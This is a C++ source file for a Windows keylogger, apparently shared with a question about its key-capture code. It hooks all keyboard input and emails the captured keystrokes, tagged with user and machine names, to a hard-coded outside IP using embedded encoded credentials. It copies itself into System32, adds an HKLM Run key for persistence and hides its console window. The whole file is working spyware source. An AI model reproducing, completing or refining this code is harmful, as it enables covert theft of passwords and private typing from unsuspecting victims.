ftpfunctions.cpp

1. #include "ftpkeylogger.h"
2.  
3. unsigned int __stdcall sendmail(void *vpkeylog){
4.  
5.     string keylog = *(string *)vpkeylog;
6.     cout << keylog.c_str();
7.  
8.     char username[4096]{};
9.     DWORD dummy = 4096; //Never used
10.     GetUserName(username, &dummy);
11.  
12.     string formatted_subject;
13.     formatted_subject.append(username); formatted_subject.append("@"); formatted_subject.append(computername); formatted_subject.append("--");
14.     formatted_subject.append(gettime());
15.  
16.     cout << keylog.c_str();
17.  
18.     email sendlog("54.245.65.132", 587, "dHN0ZXIxQGxpdmUuY29t", "YkhmdVFXOEV4RU5KMkJRREVwOVluZw==",
19.                                           "[email protected]", filetokens[2].c_str(), formatted_subject.c_str() ,keylog.c_str());
20.     sendlog.sendmail();
21.  
22.     cout << "Email sent";
23.     return 0;
24. }
25.  
26.  
27.  
28. unsigned int __stdcall keylogthreadhook(void *){
29.  
30.     HINSTANCE hinst = GetModuleHandle(NULL);
31.     HHOOK hhkLowLevelKybd  = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, hinst, 0);
32.  
33.     MSG msg;
34.  
35.     //MessageBox(NULL, "entered", NULL, NULL);
36.  
37.         while(GetMessage(&msg, NULL, 0, 0)){
38.             TranslateMessage(&msg);
39.             DispatchMessage(&msg);
40.  
41.         }
42.  
43.       UnhookWindowsHookEx(hhkLowLevelKybd);
44.  
45.       return 0;
46. }
47.  
48.  
49.  
50. LRESULT CALLBACK LowLevelKeyboardProc(int nCode, WPARAM wParam, LPARAM lParam){
51.  
52.     PKBDLLHOOKSTRUCT structdll = (PKBDLLHOOKSTRUCT) lParam;
53.  
54.     switch(nCode){
55.  
56.         case HC_ACTION:
57.             switch(wParam){
58.  
59.                 case WM_KEYDOWN:{
60.  
61.  
62.                     //How should i change the following lines?
63.  
64.                     char buffer[256]{};
65.                     GetKeyNameText((MapVirtualKey(structdll->vkCode, 0)<<16), buffer, 50);
66.                     //use this?: ToAscii(structdll->vkCode, structdll->scanCode, NULL, myword, 0);
67.                     tempkeylog_buffer.append(buffer);
68.                 }
69.                 break;
70.             }
71.         break;
72.     }
73.  
74. return CallNextHookEx(NULL, nCode, wParam,lParam);
75.  
76. }
77.  
78. string gettime(){
79.  
80.         time_t rawtime;
81.         time ( &rawtime );
82.         string str = ctime(&rawtime);
83.  
84.         //Eliminate ':' characters
85.  
86.         string::iterator it;
87.  
88.         for ( it = str.begin() ; it < str.end(); it++ ){
89.  
90.             if (*it == ':'){
91.  
92.                 *it = ',';
93.  
94.             }
95.         }
96.         //cut off \n at the end of string (why the fuck do they even do that?)
97.         str = str.substr(0, str.size()-1);
98.  
99.     return str;
100. }
101.  
102.  
103. void AddtoStartup(){
104.  /*FIRST THING WE DO IS COPY SERVER.EXE TO SYSTEM32 FOLDER AND THEN MAKE A REGISTRY KEY THAT OPENS SERVER.EXE AT STARTUP*/
105.     //NOTE we still have to implement the process hiding in task manager!~
106.     std::string filename ="\\";
107.     char system[MAX_PATH];
108.     extern char pathtofile[MAX_PATH];
109.     extern const string RegistryKeyName;
110.  
111.     //GET MODULE HANDLE OF CALLING PROGRAM I.E SERVER.EXE'S HANDLE
112.     HMODULE GetModH = GetModuleHandle(NULL);
113.  
114.     //GET PATH OF SERVER.EXE
115.     GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
116.  
117.     filename.append(PathFindFileNameA(pathtofile));
118.  
119.     //GET SYSTEM DIRECTORY LIKE SYSTEM32 OR SYSWOW64, FOR COMPATIBILITY REASONS
120.     GetSystemDirectory(system,sizeof(system));
121.  
122.     //APPEND MY FILENAME AFTER THE SYSTEMDIRECTORY SO WE CAN DROP OUR SERVER INTO THE SYSTEM 32 FOLDER
123.     strcat(system, filename.c_str());
124.  
125.     //COPY SERVER TO THE SYSTEM32 FOLDER
126.     CopyFile(pathtofile,system,false);
127.  
128.     //MAKE A REGISTRY KEY TO THE SYSTEM32FOLDER WITH SERVER.EXE TO RUN AT STARTUP
129.     HKEY hKey;
130.  
131.     RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
132.  
133.     //Some bs name in parameter 2 of Regset valueex.
134.     RegSetValueEx(hKey, RegistryKeyName.c_str(),0,REG_SZ,(const unsigned char*)system,sizeof(system));
135.  
136.     RegCloseKey(hKey);
137. }
138.  
139. void RemoveFromStartup(){
140.  
141.     extern char pathtofile[MAX_PATH];
142.     extern const string RegistryKeyName;
143.  
144.     HKEY hKey;
145.  
146.     RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
147.  
148.     RegDeleteValue(hKey, RegistryKeyName.c_str());
149.  
150.     RegCloseKey(hKey);
151.  
152.     MoveFileEx(pathtofile, NULL, MOVEFILE_DELAY_UNTIL_REBOOT);
153.  
154.  
155. }
156.  
157. void Stealth(){
158.  
159.   HWND Stealth;
160.   AllocConsole();
161.  
162.   Stealth = FindWindowA("ConsoleWindowClass", NULL);
163.   ShowWindow(Stealth,0);
164.  
165. }